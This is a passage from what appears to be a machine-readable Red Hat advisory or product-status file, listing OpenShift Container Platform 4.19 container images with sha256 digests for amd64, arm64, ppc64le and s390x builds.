"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
